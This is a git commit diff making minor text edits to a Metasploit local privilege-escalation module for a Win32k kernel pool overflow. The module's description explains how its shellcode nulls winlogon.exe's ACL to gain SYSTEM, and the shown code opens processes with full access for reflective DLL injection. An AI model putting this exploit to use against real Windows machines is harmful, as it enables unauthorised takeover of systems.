Merge pull request #3 from Meatballs1/pr3090

Pr3090
bug/bundler_fix
kyuz0 2014-05-02 14:20:00 +01:00
commit faaf0787a5
1 changed files with 3 additions and 3 deletions

View File

@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Trying to elevate the current process...")
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end